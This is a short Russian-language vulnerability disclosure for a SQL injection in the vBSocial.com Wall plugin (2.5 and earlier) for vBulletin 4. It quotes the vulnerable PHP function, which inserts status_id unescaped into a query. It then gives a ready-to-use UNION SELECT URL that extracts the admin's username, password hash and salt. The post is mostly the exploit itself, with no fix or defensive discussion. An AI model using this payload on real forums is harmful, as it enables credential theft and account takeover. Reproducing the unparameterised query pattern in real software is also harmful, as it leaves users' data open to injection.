vBulletin vBSocial.com Wall Plugin – SQL Injection

Плагин: http://www.vbulletin.org/forum/showthread.php?t=294260
Версия: <= 2.5

Версия vB: 4.x.x

Уязвимый код находится в модуле misc_start hook и файле /includes/class_statusbit.php:

public function process_fetch_status_item($status_id)
{
global $vbulletin;
$status_item = $vbulletin->db->query_first(“SELECT * FROM “.TABLE_PREFIX.”status WHERE id=’$status_id'”);
if ($status_item)
{
$status_item[‘message’] = htmlspecialchars_uni($status_item[‘message’]);
$status_item[‘message’] = smartConvertPost($status_item[‘message’]); // parse image links
$status_item[‘message’] = parse_youtubelinks($status_item[‘message’]); // parse youtube video links
$status_item[‘message’] = nl2br(trim(fetch_censored_text($status_item[‘message’])));

if ($status_item[‘type’] == ‘poll’){
$poll_get = $vbulletin->db->query_read(“SELECT * FROM “.TABLE_PREFIX.”status_poll WHERE statusid='”.$status_item[‘id’].”‘”);
if ($vbulletin->db->num_rows($poll_get) > 0){
$i = 0;
while ($poll_item = $vbulletin->db->fetch_array($poll_get)){
$i ++;
$status_item[‘message’] .= ‘<div style="margin:3px 0px;"><input type="radio" name="pollitems" id="pollitems_'.$i.'"><label>‘.$poll_item[‘fieldname’].’</label></div>‘;
}
}
}

return $status_item[‘message’];
}
}SQL код:

http://example.com/misc.php?do=ln_fetch_status_item&status_id=11' UNION SELECT null, concat(username, 0x3a, password, 0x3a, salt), null, null, null, null, null, null, null, null, null, null, null FROM user WHERE userid = '1
Пруф: